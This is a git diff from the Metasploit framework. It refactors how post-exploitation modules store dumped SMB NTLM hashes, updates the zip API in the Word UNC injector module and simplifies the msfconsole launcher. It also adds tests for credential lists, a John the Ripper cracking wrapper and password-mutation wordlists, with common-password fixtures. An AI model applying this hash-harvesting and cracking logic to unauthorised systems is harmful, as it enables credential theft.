-        )
+
+        service_data = {
+            address: host,
+            port: @smb_port,
+            service_name: 'smb',
+            protocol: 'tcp',
+            workspace_id: myworkspace_id
+        }
+
+        credential_data = {
+            origin_type: :session,
+            session_id: session_db_id,
+            post_reference_name: self.refname,
+            private_type: :ntlm_hash,
+            private_data: users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
+            username: users[rid][:Name]
+        }
+
+        credential_data.merge!(service_data)
+
+        # Create the Metasploit::Credential::Core object
+        credential_core = create_credential(credential_data)
+
+        # Assemble the options hash for creating the Metasploit::Credential::Login object
+        login_data ={
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED
+        }
+
+        # Merge in the service data and create our Login
+        login_data.merge!(service_data)
+        login = create_credential_login(login_data)
       end
 
     rescue ::Interrupt
@@ -305,14 +329,38 @@ class Metasploit3 < Msf::Post
         hash_entry = "#{user}:#{rid}:#{lmhash}:#{returned_hash[3]}"
         collected_hashes << "#{hash_entry}\n"
         print_good("\t#{hash_entry}")
-        session.framework.db.report_auth_info(
-          :host  => host,
-          :port  => @smb_port,
-          :sname => 'smb',
-          :user  => user,
-          :pass  => "#{lmhash}:#{returned_hash[3]}",
-          :type  => "smb_hash"
-        )
+
+        service_data = {
+            address: host,
+            port: @smb_port,
+            service_name: 'smb',
+            protocol: 'tcp',
+            workspace_id: myworkspace_id
+        }
+
+        credential_data = {
+            origin_type: :session,
+            session_id: session_db_id,
+            post_reference_name: self.refname,
+            private_type: :ntlm_hash,
+            private_data: "#{lmhash}:#{returned_hash[3]}",
+            username: user
+        }
+
+        credential_data.merge!(service_data)
+
+        # Create the Metasploit::Credential::Core object
+        credential_core = create_credential(credential_data)
+
+        # Assemble the options hash for creating the Metasploit::Credential::Login object
+        login_data ={
+            core: credential_core,
+            status: Metasploit::Model::Login::Status::UNTRIED
+        }
+
+        # Merge in the service data and create our Login
+        login_data.merge!(service_data)
+        login = create_credential_login(login_data)
       rescue
         next
       end
diff --git a/modules/post/windows/gather/word_unc_injector.rb b/modules/post/windows/gather/word_unc_injector.rb
index 45e976e925..9e657f8f1c 100644
--- a/modules/post/windows/gather/word_unc_injector.rb
+++ b/modules/post/windows/gather/word_unc_injector.rb
@@ -3,9 +3,20 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+#
+# Gems
+#
+
+# for extracting files
+require 'zip'
+
+#
+# Project
+#
+
 require 'msf/core'
-require 'zip/zip' #for extracting files
-require 'rex/zip' #for creating files
+# for creating files
+require 'rex/zip'
 
 class Metasploit3 < Msf::Post
 
@@ -109,17 +120,17 @@ class Metasploit3 < Msf::Post
   end
 
   #RubyZip sometimes corrupts the document when manipulating inside a
-  #compressed document, so we extract it with Zip::ZipFile into memory
+  #compressed document, so we extract it with Zip::File into memory
   def unzip_docx(zipfile)
     vprint_status("Extracting #{datastore['FILE']} into memory.")
     zip_data = Hash.new
     begin
-      Zip::ZipFile.open(zipfile)  do |filezip|
+      Zip::File.open(zipfile)  do |filezip|
         filezip.each do |entry|
           zip_data[entry.name] = filezip.read(entry)
         end
       end
-    rescue Zip::ZipError => e
+    rescue Zip::Error => e
       print_error("Error extracting #{datastore['FILE']} please verify it is a valid .docx document.")
       return nil
     end
diff --git a/msfconsole b/msfconsole
index 6a446c23bd..9dee47926f 100755
--- a/msfconsole
+++ b/msfconsole
@@ -9,150 +9,18 @@
 # $Revision$
 #
 
-msfbase = __FILE__
-while File.symlink?(msfbase)
-  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
-end
-
-@msfbase_dir = File.expand_path(File.dirname(msfbase))
-
-$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
-require 'fastlib'
-require 'msfenv'
-
-$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
-
-require 'optparse'
-
-if(RUBY_PLATFORM =~ /mswin32/)
-  $stderr.puts "[*] The msfconsole interface is not supported on the native Windows Ruby\n"
-  $stderr.puts "    interpreter. Things will break, exploits will fail, payloads will not\n"
-  $stderr.puts "    be handled correctly. Please install Cygwin or use Linux in VMWare.\n\n"
-end
-
-class OptsConsole
-  #
-  # Return a hash describing the options.
-  #
-  def self.parse(args)
-    options = {
-      'DeferModuleLoads' => true
-    }
-
-    opts = OptionParser.new do |opts|
-      opts.banner = "Usage: msfconsole [options]"
-
-      opts.separator ""
-      opts.separator "Specific options:"
-
-      opts.on("-d", "-d", "Execute the console as defanged") do
-        options['Defanged'] = true
-      end
-
-      opts.on("-r", "-r <filename>", "Execute the specified resource file") do |r|
-        options['Resource'] ||= []
-        options['Resource'] << r
-      end
-
-      opts.on("-o", "-o <filename>", "Output to the specified file") do |o|
-        options['LocalOutput'] = o
-      end
-
-      opts.on("-c", "-c <filename>", "Load the specified configuration file") do |c|
-        options['Config'] = c
-      end
-
-      opts.on("-m", "-m <directory>", "Specifies an additional module search path") do |m|
-        options['ModulePath'] = m
-      end
-
-      opts.on("-p", "-p <plugin>", "Load a plugin on startup") do |p|
-        options['Plugins'] ||= []
-        options['Plugins'] << p
-      end
-
-      opts.on("-y", "--yaml <database.yml>", "Specify a YAML file containing database settings") do |m|
-        options['DatabaseYAML'] = m
-      end
-
-      opts.on("-M", "--migration-path <dir>", "Specify a directory containing additional DB migrations") do |m|
-        options['DatabaseMigrationPaths'] ||= []
-        options['DatabaseMigrationPaths'] << m
-      end
-
-      opts.on("-e", "--environment <production|development>", "Specify the database environment to load from the YAML") do |m|
-        options['DatabaseEnv'] = m
-      end
-
-      # Boolean switches
-      opts.on("-v", "--version", "Show version") do |v|
-        options['Version'] = true
-      end
-
-      opts.on("-L", "--real-readline", "Use the system Readline library instead of RbReadline") do |v|
-        options['RealReadline'] = true
-      end
-
-      opts.on("-n", "--no-database", "Disable database support") do |v|
-        options['DisableDatabase'] = true
-      end
-
-      opts.on("-q", "--quiet", "Do not print the banner on start up") do |v|
-        options['DisableBanner'] = true
-      end
-
-      opts.on("-a", "--ask", "Ask before exiting Metasploit or accept 'exit -y'") do |v|
-        options['ConfirmExit'] = true
-      end
-      
-      opts.on("-x", "-x <command>", "Execute the specified string as console commands (use ; for multiples)") do |s|
-        options['XCommands'] ||= []
-        options['XCommands'] += s.split(/\s*;\s*/)
-      end
-
-      opts.separator ""
-      opts.separator "Common options:"
-
-      opts.on_tail("-h", "--help", "Show this message") do
-        puts opts
-        exit
-      end
-    end
-
-    begin
-      opts.parse!(args)
-    rescue OptionParser::InvalidOption
-      puts "Invalid option, try -h for usage"
-      exit
-    end
-
-    options
-  end
-end
-
-options = OptsConsole.parse(ARGV)
-
 #
-# NOTE: we don't require this until down here since we may not need it
-# when processing certain options (currently only -h)
-#
-require 'rex'
-require 'msf/ui'
-
-#
-# Everything below this line requires the framework.
+# Standard Library
 #
 
-if (options['Version'])
-  $stderr.puts 'Framework Version: ' + Msf::Framework::Version
-  exit
-end
+require 'pathname'
 
-begin
-  Msf::Ui::Console::Driver.new(
-    Msf::Ui::Console::Driver::DefaultPrompt,
-    Msf::Ui::Console::Driver::DefaultPromptChar,
-    options
-  ).run
-rescue Interrupt
-end
+#
+# Project
+#
+
+# @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/generators/rails/app/templates/script/rails#L3-L5
+require Pathname.new(__FILE__).expand_path.parent.join('config', 'boot')
+require 'metasploit/framework/command/console'
+
+Metasploit::Framework::Command::Console.start
diff --git a/script/rails b/script/rails
new file mode 100644
index 0000000000..0839ba426e
--- /dev/null
+++ b/script/rails
@@ -0,0 +1,6 @@
+#!/usr/bin/env ruby
+# This command will automatically be run when you run "rails" with Rails 3 gems installed from the root of your application.
+
+APP_PATH = File.expand_path('../../config/application',  __FILE__)
+require File.expand_path('../../config/boot',  __FILE__)
+require 'rails/commands'
\ No newline at end of file
diff --git a/spec/file_fixtures/fake_common_roots.txt b/spec/file_fixtures/fake_common_roots.txt
new file mode 100644
index 0000000000..9316db735d
--- /dev/null
+++ b/spec/file_fixtures/fake_common_roots.txt
@@ -0,0 +1,3 @@
+password
+root
+toor
\ No newline at end of file
diff --git a/spec/file_fixtures/fake_default_wordlist.txt b/spec/file_fixtures/fake_default_wordlist.txt
new file mode 100644
index 0000000000..0e27467f4b
--- /dev/null
+++ b/spec/file_fixtures/fake_default_wordlist.txt
@@ -0,0 +1,3 @@
+changeme
+summer123
+admin
\ No newline at end of file
diff --git a/spec/lib/active_record/connection_adapters/abstract_adapter/connection_pool_spec.rb b/spec/lib/active_record/connection_adapters/abstract_adapter/connection_pool_spec.rb
index 45798cd30f..8febb6deb7 100644
--- a/spec/lib/active_record/connection_adapters/abstract_adapter/connection_pool_spec.rb
+++ b/spec/lib/active_record/connection_adapters/abstract_adapter/connection_pool_spec.rb
@@ -1,19 +1,16 @@
 # -*- coding:binary -*-
 require 'spec_helper'
 
-# helps with environment configuration to use for connection to database
-require 'metasploit/framework'
-
-# load Mdm::Host for testing
-MetasploitDataModels.require_models
-
 describe ActiveRecord::ConnectionAdapters::ConnectionPool do
+  self.use_transactional_fixtures = false
+
   def database_configurations
     YAML.load_file(database_configurations_pathname)
   end
 
   def database_configurations_pathname
-    Metasploit::Framework.root.join('config', 'database.yml')
+    # paths are always Array<String>, but there should only be on 'config/database' entry
+    Rails.application.config.paths['config/database'].first
   end
 
   subject(:connection_pool) do
@@ -24,7 +21,7 @@ describe ActiveRecord::ConnectionAdapters::ConnectionPool do
   # used, so have to manually establish connection.
   before(:each) do
     ActiveRecord::Base.configurations = database_configurations
-    spec = ActiveRecord::Base.configurations[Metasploit::Framework.env]
+    spec = ActiveRecord::Base.configurations[Rails.env]
     ActiveRecord::Base.establish_connection(spec)
   end
 
diff --git a/lib/zip/test/data/generated/empty_chmod640.txt b/spec/lib/metasploit/framework/afp/client_spec.rb
similarity index 100%
rename from lib/zip/test/data/generated/empty_chmod640.txt
rename to spec/lib/metasploit/framework/afp/client_spec.rb
diff --git a/spec/lib/metasploit/framework/credential_collection_spec.rb b/spec/lib/metasploit/framework/credential_collection_spec.rb
new file mode 100644
index 0000000000..cfe583036b
--- /dev/null
+++ b/spec/lib/metasploit/framework/credential_collection_spec.rb
@@ -0,0 +1,148 @@
+require 'spec_helper'
+require 'metasploit/framework/credential_collection'
+
+describe Metasploit::Framework::CredentialCollection do
+
+  subject(:collection) do
+    described_class.new(
+      blank_passwords: blank_passwords,
+      pass_file: pass_file,
+      password: password,
+      user_as_pass: user_as_pass,
+      user_file: user_file,
+      username: username,
+      userpass_file: userpass_file,
+    )
+  end
+
+  let(:blank_passwords) { nil }
+  let(:username) { "user" }
+  let(:password) { "pass" }
+  let(:user_file) { nil }
+  let(:pass_file) { nil }
+  let(:user_as_pass) { nil }
+  let(:userpass_file) { nil }
+
+  describe "#each" do
+    specify do
+      expect { |b| collection.each(&b) }.to yield_with_args(Metasploit::Framework::Credential)
+    end
+
+    context "when given a user_file and password" do
+      let(:username) { nil }
+      let(:user_file) do
+        filename = "foo"
+        stub_file = StringIO.new("asdf\njkl\n")
+        File.stub(:open).with(filename,/^r/).and_yield stub_file
+
+        filename
+      end
+
+      specify  do
+        expect { |b| collection.each(&b) }.to yield_successive_args(
+          Metasploit::Framework::Credential.new(public: "asdf", private: password),
+          Metasploit::Framework::Credential.new(public: "jkl", private: password),
+        )
+      end
+    end
+
+    context "when given a pass_file and username" do
+      let(:password) { nil }
+      let(:pass_file) do
+        filename = "foo"
+        stub_file = StringIO.new("asdf\njkl\n")
+        File.stub(:open).with(filename,/^r/).and_return stub_file
+
+        filename
+      end
+
+      specify  do
+        expect { |b| collection.each(&b) }.to yield_successive_args(
+          Metasploit::Framework::Credential.new(public: username, private: "asdf"),
+          Metasploit::Framework::Credential.new(public: username, private: "jkl"),
+        )
+      end
+    end
+
+
+    context "when given a userspass_file" do
+      let(:username) { nil }
+      let(:password) { nil }
+      let(:userpass_file) do
+        filename = "foo"
+        stub_file = StringIO.new("asdf jkl\nfoo bar\n")
+        File.stub(:open).with(filename,/^r/).and_yield stub_file
+
+        filename
+      end
+
+      specify  do
+        expect { |b| collection.each(&b) }.to yield_successive_args(
+          Metasploit::Framework::Credential.new(public: "asdf", private: "jkl"),
+          Metasploit::Framework::Credential.new(public: "foo", private: "bar"),
+        )
+      end
+    end
+
+    context "when given a pass_file and user_file" do
+      let(:password) { nil }
+      let(:username) { nil }
+      let(:user_file) do
+        filename = "user_file"
+        stub_file = StringIO.new("asdf\njkl\n")
+        File.stub(:open).with(filename,/^r/).and_yield stub_file
+
+        filename
+      end
+      let(:pass_file) do
+        filename = "pass_file"
+        stub_file = StringIO.new("asdf\njkl\n")
+        File.stub(:open).with(filename,/^r/).and_return stub_file
+
+        filename
+      end
+
+      specify  do
+        expect { |b| collection.each(&b) }.to yield_successive_args(
+          Metasploit::Framework::Credential.new(public: "asdf", private: "asdf"),
+          Metasploit::Framework::Credential.new(public: "asdf", private: "jkl"),
+          Metasploit::Framework::Credential.new(public: "jkl", private: "asdf"),
+          Metasploit::Framework::Credential.new(public: "jkl", private: "jkl"),
+        )
+      end
+    end
+
+    context "when :user_as_pass is true" do
+      let(:user_as_pass) { true }
+      specify  do
+        expect { |b| collection.each(&b) }.to yield_successive_args(
+          Metasploit::Framework::Credential.new(public: username, private: password),
+          Metasploit::Framework::Credential.new(public: username, private: username),
+        )
+      end
+    end
+
+    context "when :blank_passwords is true" do
+      let(:blank_passwords) { true }
+      specify  do
+        expect { |b| collection.each(&b) }.to yield_successive_args(
+          Metasploit::Framework::Credential.new(public: username, private: password),
+          Metasploit::Framework::Credential.new(public: username, private: ""),
+        )
+      end
+    end
+
+  end
+
+  describe "#prepend_cred" do
+    specify do
+      prep = Metasploit::Framework::Credential.new(public: "foo", private: "bar")
+      collection.prepend_cred(prep)
+      expect { |b| collection.each(&b) }.to yield_successive_args(
+        prep,
+        Metasploit::Framework::Credential.new(public: username, private: password),
+      )
+    end
+  end
+
+end
diff --git a/spec/lib/metasploit/framework/credential_spec.rb b/spec/lib/metasploit/framework/credential_spec.rb
new file mode 100644
index 0000000000..2856966b96
--- /dev/null
+++ b/spec/lib/metasploit/framework/credential_spec.rb
@@ -0,0 +1,142 @@
+require 'spec_helper'
+require 'metasploit/framework/credential'
+
+describe Metasploit::Framework::Credential do
+
+  subject(:cred_detail) {
+    described_class.new
+  }
+
+  it { should respond_to :paired }
+  it { should respond_to :private }
+  it { should respond_to :private_type }
+  it { should respond_to :public }
+  it { should respond_to :realm }
+  it { should respond_to :realm_key }
+
+  describe "#paired" do
+    it "defaults to true" do
+      expect(cred_detail.paired).to be_true
+    end
+  end
+
+  context 'validations' do
+
+    it 'is not valid without paired being set' do
+      expect(cred_detail).to_not be_valid
+    end
+
+    context 'when not paired' do
+      before(:each) do
+        cred_detail.paired = false
+      end
+
+      it 'is invalid without at least a public or a private' do
+        expect(cred_detail).to_not be_valid
+      end
+
+      it 'is valid with just a public' do
+        cred_detail.public = 'root'
+        expect(cred_detail).to be_valid
+      end
+
+      it 'is valid with just a private' do
+        cred_detail.private = 'toor'
+        expect(cred_detail).to be_valid
+      end
+    end
+
+    context 'when paired' do
+      before(:each) do
+        cred_detail.paired = true
+      end
+
+      it 'is invalid with only a public' do
+        cred_detail.public = 'root'
+        expect(cred_detail).to_not be_valid
+      end
+
+      it 'is invalid with only a private' do
+        cred_detail.private = 'toor'
+        expect(cred_detail).to_not be_valid
+      end
+
+      it 'is invalid with empty string for public' do
+        cred_detail.public = ''
+        cred_detail.private = 'toor'
+        expect(cred_detail).to_not be_valid
+      end
+
+      it 'is valid with empty string for private' do
+        cred_detail.public = 'root'
+        cred_detail.private = ''
+        expect(cred_detail).to be_valid
+      end
+    end
+
+  end
+
+  describe ".to_credential" do
+    let(:public) { "public" }
+    let(:private) { "private" }
+    let(:realm) { "realm" }
+    subject(:cred_detail) do
+      described_class.new(public: public, private: private, realm: realm)
+    end
+    it { should respond_to :to_credential }
+    it "should return self" do
+      cred_detail.to_credential.should eq(cred_detail)
+    end
+  end
+
+  describe "#==" do
+    let(:public) { "public" }
+    let(:private) { "private" }
+    let(:realm) { "realm" }
+    subject(:cred_detail) do
+      described_class.new(public: public, private: private, realm: realm)
+    end
+
+    context "when all attributes match" do
+      let(:other) do
+        described_class.new(public: public, private: private, realm: realm)
+      end
+      specify do
+        expect(other).to eq(cred_detail)
+      end
+    end
+
+    context "when realm does not match" do
+      let(:other) do
+        described_class.new(public: public, private: private, realm: "")
+      end
+      specify do
+        expect(other).not_to eq(cred_detail)
+      end
+    end
+
+    context "when private does not match" do
+      let(:other) do
+        described_class.new(public: public, private: "", realm: realm)
+      end
+      specify do
+        expect(other).not_to eq(cred_detail)
+      end
+    end
+
+    context "when public does not match" do
+      let(:other) do
+        described_class.new(public: "", private: private, realm: realm)
+      end
+      specify do
+        expect(other).not_to eq(cred_detail)
+      end
+    end
+    context "when comparing to a different object" do
+      let(:other) {'a string'}
+      specify do
+        expect(other).not_to eq(cred_detail)
+      end
+    end
+  end
+end
diff --git a/spec/lib/metasploit/framework/jtr/cracker_spec.rb b/spec/lib/metasploit/framework/jtr/cracker_spec.rb
new file mode 100644
index 0000000000..8ec3ea8bb0
--- /dev/null
+++ b/spec/lib/metasploit/framework/jtr/cracker_spec.rb
@@ -0,0 +1,248 @@
+require 'spec_helper'
+require 'metasploit/framework/jtr/cracker'
+
+describe Metasploit::Framework::JtR::Cracker do
+
+  subject(:cracker) { described_class.new }
+  let(:john_path) { '/path/to/john' }
+  let(:other_john_path) { '/path/to/other/john' }
+  let(:session_id) { 'Session1' }
+  let(:config) { '/path/to/config.conf' }
+  let(:pot) { '/path/to/john.pot' }
+  let(:other_pot) { '/path/to/other/pot' }
+  let(:wordlist) { '/path/to/wordlist' }
+  let(:hash_path) { '/path/to/hashes' }
+  let(:nt_format) { 'nt' }
+  let(:incremental) { 'Digits5' }
+  let(:rules)   { 'Rule34'}
+  let(:max_runtime) { 5000 }
+
+  describe '#binary_path' do
+
+
+    context 'when the user supplied a john_path' do
+      before(:each) do
+        cracker.john_path = john_path
+      end
+
+      it 'returns the manual path if it exists and is a regular file' do
+        expect(::File).to receive(:file?).with(john_path).once.and_return true
+        expect(cracker.binary_path).to eq john_path
+      end
+
+      it 'rejects the manual path if it does not exist or is not a regular file' do
+        expect(::File).to receive(:file?).with(john_path).once.and_return false
+        expect(Rex::FileUtils).to receive(:find_full_path).with('john').and_return other_john_path
+        expect(::File).to receive(:file?).with(other_john_path).once.and_return true
+        expect(cracker.binary_path).to_not eq john_path
+      end
+    end
+
+    context 'when the user did not supply a path' do
+      it 'returns the john binary from the PATH if it exists' do
+        expect(Rex::FileUtils).to receive(:find_full_path).and_return john_path
+        expect(::File).to receive(:file?).with(john_path).once.and_return true
+        expect(cracker.binary_path).to eq john_path
+      end
+
+      it 'returns the shipped john binary if it does not exist in the PATH' do
+        expect(Rex::FileUtils).to receive(:find_full_path).twice.and_return nil
+        expect(cracker).to receive(:select_shipped_binary).and_return other_john_path
+        expect(cracker.binary_path).to eq other_john_path
+      end
+    end
+  end
+
+  describe '#crack_command' do
+    before(:each) do
+      expect(cracker).to receive(:binary_path).and_return john_path
+      expect(cracker).to receive(:john_session_id).and_return session_id
+    end
+
+    it 'starts with the john binary path' do
+      expect(cracker.crack_command[0]).to eq john_path
+    end
+
+    it 'sets a session id' do
+      expect(cracker.crack_command).to include "--session=#{session_id}"
+    end
+
+    it 'sets the nolog flag' do
+      expect(cracker.crack_command).to include '--nolog'
+    end
+
+    it 'adds a config directive if the user supplied one' do
+      cracker.config = config
+      expect(cracker.crack_command).to include "--config=#{config}"
+    end
+
+    it 'does not use a config directive if not supplied one' do
+      expect(cracker.crack_command).to_not include "--config=#{config}"
+    end
+
+    it 'uses the user supplied john.pot if there is one' do
+      cracker.pot = pot
+      expect(cracker.crack_command).to include "--pot=#{pot}"
+    end
+
+    it 'uses default john.pot if the user did not supply one' do
+      expect(cracker).to receive(:john_pot_file).and_return other_pot
+      expect(cracker.crack_command).to include "--pot=#{other_pot}"
+    end
+
+    it 'uses the user supplied format directive' do
+      cracker.format = nt_format
+      expect(cracker.crack_command).to include "--format=#{nt_format}"
+    end
+
+    it 'uses the user supplied wordlist directive' do
+      cracker.wordlist = wordlist
+      expect(cracker.crack_command).to include "--wordlist=#{wordlist}"
+    end
+
+    it 'uses the user supplied incremental directive' do
+      cracker.incremental = incremental
+      expect(cracker.crack_command).to include "--incremental=#{incremental}"
+    end
+
+    it 'uses the user supplied rules directive' do
+      cracker.rules = rules
+      expect(cracker.crack_command).to include "--rules=#{rules}"
+    end
+
+    it 'uses the user supplied max-run-time' do
+      cracker.max_runtime = max_runtime
+      expect(cracker.crack_command).to include "--max-run-time=#{max_runtime.to_s}"
+    end
+
+    it 'puts the path to the has file at the end' do
+      cracker.hash_path = hash_path
+      expect(cracker.crack_command.last).to eq hash_path
+    end
+
+  end
+
+  describe '#show_command' do
+    before(:each) do
+      expect(cracker).to receive(:binary_path).and_return john_path
+    end
+
+    it 'starts with the john binary path' do
+      expect(cracker.show_command[0]).to eq john_path
+    end
+
+    it 'has the --show flag' do
+      expect(cracker.show_command).to include '--show'
+    end
+
+    it 'uses the user supplied john.pot if there is one' do
+      cracker.pot = pot
+      expect(cracker.show_command).to include "--pot=#{pot}"
+    end
+
+    it 'uses default john.pot if the user did not supply one' do
+      expect(cracker).to receive(:john_pot_file).and_return other_pot
+      expect(cracker.show_command).to include "--pot=#{other_pot}"
+    end
+
+    it 'uses the user supplied format directive' do
+      cracker.format = nt_format
+      expect(cracker.show_command).to include "--format=#{nt_format}"
+    end
+
+    it 'puts the path to the has file at the end' do
+      cracker.hash_path = hash_path
+      expect(cracker.show_command.last).to eq hash_path
+    end
+  end
+
+  describe 'validations' do
+    context 'failures' do
+      context 'file_path validators' do
+        before(:each) do
+          expect(File).to receive(:file?).and_return false
+        end
+
+        it 'produces the correct error message for config' do
+          cracker.config = config
+          expect(cracker).to_not be_valid
+          expect(cracker.errors[:config]).to include "is not a valid path to a regular file"
+        end
+
+        it 'produces the correct error message for hash_path' do
+          cracker.hash_path = hash_path
+          expect(cracker).to_not be_valid
+          expect(cracker.errors[:hash_path]).to include "is not a valid path to a regular file"
+        end
+
+        it 'produces the correct error message for pot' do
+          cracker.pot = pot
+          expect(cracker).to_not be_valid
+          expect(cracker.errors[:pot]).to include "is not a valid path to a regular file"
+        end
+
+        it 'produces the correct error message for wordlist' do
+          cracker.wordlist = wordlist
+          expect(cracker).to_not be_valid
+          expect(cracker.errors[:wordlist]).to include "is not a valid path to a regular file"
+        end
+      end
+
+      context 'executable_path validators' do
+        before(:each) do
+          expect(File).to receive(:executable?).and_return false
+        end
+
+        it 'produces the correct error message for john_path' do
+          cracker.john_path = john_path
+          expect(cracker).to_not be_valid
+          expect(cracker.errors[:john_path]).to include "is not a valid path to an executable file"
+        end
+      end
+    end
+
+    context 'successes' do
+      context 'file_path validators' do
+        before(:each) do
+          expect(File).to receive(:file?).and_return true
+        end
+
+        it 'produces no error message for config' do
+          cracker.config = config
+          expect(cracker).to be_valid
+          expect(cracker.errors[:config]).to_not include "is not a valid path to a regular file"
+        end
+
+        it 'produces no error message for hash_path' do
+          cracker.hash_path = hash_path
+          expect(cracker).to be_valid
+          expect(cracker.errors[:hash_path]).to_not include "is not a valid path to a regular file"
+        end
+
+        it 'produces no error message for pot' do
+          cracker.pot = pot
+          expect(cracker).to be_valid
+          expect(cracker.errors[:pot]).to_not include "is not a valid path to a regular file"
+        end
+
+        it 'produces no error message for wordlist' do
+          cracker.wordlist = wordlist
+          expect(cracker).to be_valid
+          expect(cracker.errors[:wordlist]).to_not include "is not a valid path to a regular file"
+        end
+      end
+
+      context 'executable_path validators' do
+        before(:each) do
+          expect(File).to receive(:executable?).and_return true
+        end
+
+        it 'produces no error message for john_path' do
+          cracker.john_path = john_path
+          expect(cracker).to be_valid
+          expect(cracker.errors[:john_path]).to_not include "is not a valid path to an executable file"
+        end
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/jtr/invalid_wordlist_spec.rb b/spec/lib/metasploit/framework/jtr/invalid_wordlist_spec.rb
new file mode 100644
index 0000000000..9061e2c78a
--- /dev/null
+++ b/spec/lib/metasploit/framework/jtr/invalid_wordlist_spec.rb
@@ -0,0 +1,38 @@
+require 'spec_helper'
+require 'metasploit/framework/jtr/invalid_wordlist'
+
+describe Metasploit::Framework::JtR::InvalidWordlist do
+
+  subject(:invalid) do
+    described_class.new(model)
+  end
+
+  let(:model) do
+    model_class.new
+  end
+
+  let(:model_class) do
+    Class.new do
+      include ActiveModel::Validations
+    end
+  end
+
+  it { should be_a StandardError }
+
+  it 'should use ActiveModel::Errors#full_messages' do
+    model.errors.should_receive(:full_messages).and_call_original
+
+    described_class.new(model)
+  end
+
+  context '#model' do
+    subject(:error_model) do
+      invalid.model
+    end
+
+    it 'should be the passed in model' do
+      error_model.should == model
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/jtr/wordlist_spec.rb b/spec/lib/metasploit/framework/jtr/wordlist_spec.rb
new file mode 100644
index 0000000000..7067bcf683
--- /dev/null
+++ b/spec/lib/metasploit/framework/jtr/wordlist_spec.rb
@@ -0,0 +1,138 @@
+require 'spec_helper'
+require 'metasploit/framework/jtr/wordlist'
+
+describe Metasploit::Framework::JtR::Wordlist do
+
+  subject(:wordlist) { described_class.new }
+
+  let(:custom_wordlist) { File.expand_path('string_list.txt',FILE_FIXTURES_PATH) }
+  let(:expansion_word) { 'Foo bar_baz-bat.bam\\foo//bar' }
+  let(:common_root_path) { File.expand_path('fake_common_roots.txt',FILE_FIXTURES_PATH) }
+  let(:default_wordlist_path) { File.expand_path('fake_default_wordlist.txt',FILE_FIXTURES_PATH) }
+  let(:password) { FactoryGirl.create(:metasploit_credential_password) }
+  let(:public) { FactoryGirl.create(:metasploit_credential_public) }
+  let(:realm) { FactoryGirl.create(:metasploit_credential_realm) }
+  let(:mutate_me) { 'password' }
+  let(:mutants) {  [
+      "pa55word",
+      "password",
+      "pa$$word",
+      "passw0rd",
+      "pa55w0rd",
+      "pa$$w0rd",
+      "p@ssword",
+      "p@55word",
+      "p@$$word",
+      "p@ssw0rd",
+      "p@55w0rd",
+      "p@$$w0rd"
+  ] }
+
+  it { should respond_to :appenders }
+  it { should respond_to :custom_wordlist }
+  it { should respond_to :mutate }
+  it { should respond_to :prependers }
+  it { should respond_to :use_common_root }
+  it { should respond_to :use_creds }
+  it { should respond_to :use_db_info }
+  it { should respond_to :use_default_wordlist }
+  it { should respond_to :use_hostnames }
+
+  describe 'validations' do
+
+    it 'raises an error if the custom_wordlist does not exist on the filesystem' do
+      expect(File).to receive(:file?).and_return false
+      wordlist.custom_wordlist = custom_wordlist
+      expect(wordlist).to_not be_valid
+      expect(wordlist.errors[:custom_wordlist]).to include "is not a valid path to a regular file"
+    end
+
+    it 'raises an error if mutate is not set to true or false' do
+      expect(wordlist).to_not be_valid
+      expect(wordlist.errors[:mutate]).to include "must be true or false"
+    end
+
+    it 'raises an error if use_common_root is not set to true or false' do
+      expect(wordlist).to_not be_valid
+      expect(wordlist.errors[:use_common_root]).to include "must be true or false"
+    end
+
+    it 'raises an error if use_creds is not set to true or false' do
+      expect(wordlist).to_not be_valid
+      expect(wordlist.errors[:use_creds]).to include "must be true or false"
+    end
+
+    it 'raises an error if use_db_info is not set to true or false' do
+      expect(wordlist).to_not be_valid
+      expect(wordlist.errors[:use_db_info]).to include "must be true or false"
+    end
+
+    it 'raises an error if use_default_wordlist is not set to true or false' do
+      expect(wordlist).to_not be_valid
+      expect(wordlist.errors[:use_default_wordlist]).to include "must be true or false"
+    end
+
+    it 'raises an error if use_hostnames is not set to true or false' do
+      expect(wordlist).to_not be_valid
+      expect(wordlist.errors[:use_hostnames]).to include "must be true or false"
+    end
+  end
+
+  describe '#valid!' do
+    it 'raises an InvalidWordlist exception if not valid?' do
+      expect{ wordlist.valid! }.to raise_error Metasploit::Framework::JtR::InvalidWordlist
+    end
+  end
+
+  describe '#expanded_words' do
+    it 'yields all the possible component words in the string' do
+      expect { |b| wordlist.expanded_words(expansion_word,&b) }.to yield_successive_args('Foo','bar','baz','bat','bam','foo','bar')
+    end
+  end
+
+  describe '#each_custom_word' do
+    it 'yields each word in that wordlist' do
+      wordlist.custom_wordlist = custom_wordlist
+      expect{ |b| wordlist.each_custom_word(&b) }.to yield_successive_args('foo', 'bar','baz')
+    end
+  end
+
+  describe '#each_root_word' do
+    it 'yields each word in the common_roots.txt list' do
+      expect(wordlist).to receive(:common_root_words_path).and_return common_root_path
+      expect { |b| wordlist.each_root_word(&b) }.to yield_successive_args('password', 'root', 'toor')
+    end
+  end
+
+  describe '#each_default_word' do
+    it 'yields each word in the passwords.lst list' do
+      expect(wordlist).to receive(:default_wordlist_path).and_return default_wordlist_path
+      expect { |b| wordlist.each_default_word(&b) }.to yield_successive_args('changeme', 'summer123', 'admin')
+    end
+  end
+
+  define '#each_cred_word' do
+    it 'yields each username,password,and realm in the database' do
+      expect{ |b| wordlist.each_cred_word(&b) }.to yield_successive_args(password.data, public,username, realm,value)
+    end
+  end
+
+  describe '#mutate_word' do
+    it 'returns an array with all possible mutations of the word' do
+      expect(wordlist.mutate_word(mutate_me)).to eq mutants
+    end
+  end
+
+  describe '#each_mutated_word' do
+    it 'yields each unique mutated word if mutate set to true' do
+      wordlist.mutate = true
+      expect { |b| wordlist.each_mutated_word(mutate_me,&b)}.to yield_successive_args(*mutants)
+    end
+
+    it 'yields the original word if mutate set to true' do
+      wordlist.mutate = false
+      expect { |b| wordlist.each_mutated_word(mutate_me,&b)}.to yield_with_args(mutate_me)
+    end
+  end
+
+end
\ No newline at end of file
